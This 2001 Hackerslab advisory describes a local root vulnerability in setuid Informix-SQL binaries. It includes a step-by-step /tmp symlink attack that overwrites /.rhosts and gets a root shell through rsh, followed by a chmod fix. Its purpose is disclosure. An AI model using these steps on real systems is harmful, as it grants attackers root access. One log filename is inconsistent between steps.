[ Hackerslab bug_paper ] Informix-SQL application vulnerability
Date: Tue, 4 Sep 2001 22:18:47 +0900 (KST)
From: [email protected]
To: [email protected]
Subject: [ Hackerslab bug_paper ] Informix-SQL application vulnerability


[ Hackerslab bug_paper ] Informix-SQL application vulnerability
File   : Informix-SQL application
SYSTEM : Systems running Informix
INFO   : There is a vulnerability in the Informix-SQL application which allows
         local users to create any file with root privilege:

PART 1:

    $ id
    uid=500 (informix) gid=120 (informix) groups=1000(loveyou)
    $ umask 0000
    $ cd ~informix/bin     (Informix HOME Directory)
    $ ./onshowaudit
    INFORMIX-SQL Version 7.31.UC5
    $ ls -al onbar_d ondblog onsmsync onsrvapd
    -rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d
    -rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog
    -rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync
    -rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd
    $ ./onbar_d or ./ondblog or ./onsmsync
    $ ls -al /tmp/bar*
    -rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log
    -rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log

PART 2:

    $ ./onsrvapd
    $ ls -al /tmp/ons*
    -rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log
    -rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log

PART 3:

    $ ./snmpdm
    $ ls -al /tmp/snmpd.log
    -rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log

PART 4:

    loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log
    loveyou@dogfoot$ ~informix/bin/onsrvapd &
    loveyou@dogfoot$ ls -al /.rhosts
    -rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts
    loveyou@dogfoot$ echo "+ +" > /.rhosts
    loveyou@dogfoot$ rsh -l root localhost csh -i
    # whoami
    root

SOLUTION : Remove the setuid permission, contact your vendor and get a patch.

    $ su -
    # cd ~informix/bin     (Informix HOME Directory)
    # chmod u-s onbar_d ondblog onsmsync onsrvapd

==-------------------------------------------------------------------------------==
  Kim Yong-Jun
  [email protected]
  [ http://www.hackerslab.org ]
  HACKERSLAB (C) since 1999
==-------------------------------------------------------------------------------==
